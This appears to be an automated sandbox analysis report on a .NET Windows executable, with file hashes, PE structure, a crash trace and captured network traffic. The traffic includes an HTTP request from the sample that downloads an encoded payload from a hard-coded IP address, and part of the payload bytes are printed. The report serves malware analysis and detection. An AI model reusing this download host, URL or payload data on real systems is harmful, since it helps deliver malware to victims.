                                                                                            SHA-512:17C27C5E40BF78B2CE94433A44730705CA78935F1440AA51E19CDE6473B5B6054F7A7BC3FD4E28328C901A5407BEC4D08637717679BF014BA1A8D9D4B592F032
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):3.807504640723351
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:5UF5TZrdxdXD5FQp8XXQnGOf2o/Pmxwpm5GjZmGmBDTTmb5NGUtYbm:S7Nr1XDQpl1f2o2xwpaWmGmpTmVNGUYb
                                                                                            MD5:7D4E158A3C81C4432E34E07591F31C8E
                                                                                            SHA1:7DFADAD40FC3098F78C9E2730C47F3353C3305F6
                                                                                            SHA-256:45734C12A12E5C99B6CCDE171BF321CECE88FDC91D8815A59E54979093969C18
                                                                                            SHA-512:366F38879BBF7B422E4EAFAA43789864E98B15E5CAA73891E0415FB5C6DFF42ED086C3CC8E81A64A9ACD4AB6C88ED522A689BFA390EAB71BFD7B1F1928F74055
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`HvLE.^......P..............7..$..9..r.|............................. ..hbin................p.\..,..........nk,.R..=P................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .R..=P....... ...........P............... .......Z.......................Root........lf......Root....nk .R..=P....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                            \Device\ConDrv
                                                                                            Process:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):4.990885062259935
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:15wG4C4iWonzpwXWonz6OZkZWGO8sOZcTGpmmwhfoswDEkrl6eR1S1ZRpzZHVwre:sGr4iWozQWozLk8cJE5hfSIz91ZRpse
                                                                                            MD5:7685F6A27382549A35DF3EDA62761724
                                                                                            SHA1:50D09D93E5BD99DDA67FDBC0661AFBABFC2CDA13
                                                                                            SHA-256:02DC0D80E62CBEC6C231EA3AE11D32F585D558978E46D2AB533A53F87D538B7F
                                                                                            SHA-512:F3C44E4BD8123B09BF51A9C2983237F8F1C3D36F1A4CBDD9BC1CF65B0AD8426C778C02DB604D7EB20AA3100A5740C981CDF8D6413DA2B47129EF669F30052581
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: .Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentException: Process with an Id of 4896 is not running... at System.Diagnostics.Process.GetProcessById(Int32 processId, String machineName).. at System.Diagnostics.Process.GetProcessById(Int32 processId).. at fixedhost.modulation.d1TYC4A1(String path, String cmd, Byte[] data, Boolean d7W15ADW2).. at fixedhost.modulation.cookie(String path, String cmd, Byte[] data).. --- End of inner exception stack trace ---.. at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor).. at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments).. at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture).. at System.RuntimeType.InvokeMember(String name, Bind

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):4.673644197618154
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:W7UbgU8x18.exe
                                                                                            File size:24064
                                                                                            MD5:01f140fea9669403791fb89c47138d69
                                                                                            SHA1:c4278cf25da52adc05f4d2161a11c7b96928ccea
                                                                                            SHA256:f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
                                                                                            SHA512:e0b76497aaea31d9915a65eeec2dcdc33ca7ca99377a12b1341a61733869438c02b74e5b09e52b899846e24e675c5eac17c6d940350ac2edf51c53e4a5fab8b9
                                                                                            SSDEEP:384:6ARfkJGzRvrQRkKA4rsf1t2kV5qSaciCjFortND8QobS58/pJbouSbx0Ci3HzKQC:jfkJGzFrQ/Bajf57iBDuf/pJbouSbyCp
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p2............"...0..T..........*r... ........@.. ....................................`................................

                                                                                            File Icon

                                                                                            Icon Hash:00828e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x40722a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                            Time Stamp:0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x71d70x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x5d8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x71200x38.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x52300x5400False0.393322172619data4.77599367946IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x80000x5d80x600False0.430989583333data4.17289736273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_VERSION0x80900x348data
                                                                                            RT_MANIFEST0x83e80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            Translation0x0000 0x04b0
                                                                                            LegalCopyrightCopyright 2021
                                                                                            Assembly Version21.13.1.0
                                                                                            InternalNametuneraidfix.exe
                                                                                            FileVersion21.13.1.0
                                                                                            CompanyNameMicoTech
                                                                                            LegalTrademarks
                                                                                            Comments
                                                                                            ProductNametuneraidfix
                                                                                            ProductVersion21.13.1.0
                                                                                            FileDescriptiontuneraidfix
                                                                                            OriginalFilenametuneraidfix.exe

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2021 15:00:19.096450090 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.124773979 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.124922991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.131431103 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160027981 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160068035 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160084009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160100937 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160116911 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160132885 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160149097 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160170078 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160187006 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160187960 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160207987 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.160213947 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160239935 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.160264969 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187566042 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187591076 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187608004 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187624931 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187639952 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187659979 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187685013 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187704086 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187706947 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187733889 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187752008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187755108 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187771082 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187786102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187803030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187820911 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187823057 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187855959 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187869072 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187886000 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187902927 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187918901 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187922955 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187942982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.187943935 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187961102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.187978029 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.188011885 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.188040018 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215025902 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215044975 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215080976 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215116024 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215145111 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215164900 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215234995 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215251923 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215290070 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215327024 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215343952 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215359926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215375900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215393066 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215401888 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215410948 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215435982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215454102 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215454102 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215471983 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215487003 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215507030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215517998 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215555906 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215589046 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215605974 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215621948 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215641022 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215651035 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215682030 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215689898 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215708971 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215724945 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215740919 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215754032 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215761900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215783119 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.215784073 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215836048 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.215871096 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216353893 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216371059 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216386080 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216406107 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216409922 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216423988 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216440916 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216453075 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216461897 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216479063 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216497898 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216500044 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216519117 CET4972280192.168.2.5194.85.248.219

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2021 15:02:07.988897085 CET5853053192.168.2.58.8.8.8
                                                                                            Nov 25, 2021 15:02:08.120956898 CET53585308.8.8.8192.168.2.5

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Nov 25, 2021 15:02:07.988897085 CET192.168.2.58.8.8.80x1daStandard query (0)odin.mk-host.comA (IP address)IN (0x0001)

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Nov 25, 2021 15:02:08.120956898 CET8.8.8.8192.168.2.50x1daNo error (0)odin.mk-host.com209.205.200.74A (IP address)IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • 194.85.248.219

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.549722194.85.248.21980C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Nov 25, 2021 15:00:19.131431103 CET253OUTGET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Connection: Keep-Alive
                                                                                            Nov 25, 2021 15:00:19.160027981 CET254INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 442789
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 9f c2 9c c2 94 c2 bc c3 b8 c2 90 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a6 c3 9d c3 a0 c3 a1 c3 b9 c2 ad c2 8f c2 bd c3 97 c3 a2 c3 96 c3 bc c3 98 c3 bd c3 b4 c3 ac c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 b6 c3 ba c3 98 c3 8c c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 9d c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2f 38 7e 7c 62 16 26 31 3e 19 3e 30 2b 37 1e 35 3b 28 48 6c 52 26 16 01 0e 29 0e 0d 1b 17 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 70 4c 1b 77 5e 76 6a 68 2e 2c 12 66 5e 41 4b 69 4c 45 5c 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 bc c2 a1 c2 ab c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c2 ab c2 b8 c3 be c3 bc c3 a2 c2 96 c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 16 30 3e 2a 0a 2f 2a 1c 24 39 22 2a 2d 7f 6f 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 1d 1a 0d 14 09 12 1a 2d 4f 3f 33 45 77 7e 6f 4a 6f 69 5a 64 4f 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 4d 56 5a 7a 5f 5a 48 54 49 52 5a 53 0f c3 bf c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 82 c2 ac c2 be c3 b9 c3 8f c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ab c3 bf c2 9f c3 ad c3 8a c3 ab c3 91 c3 96 c3 a4 c3 b9 c3 a2 c3 af c3 bb c2 bf c2 a3 c2 a3 c3 93 c3 b7 c3 b6 c3 bf c3 99 c3 99 c3 ba c3 aa c3 b4 c3 a9 c3 b2 c3 ba c3 ab c2 af c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
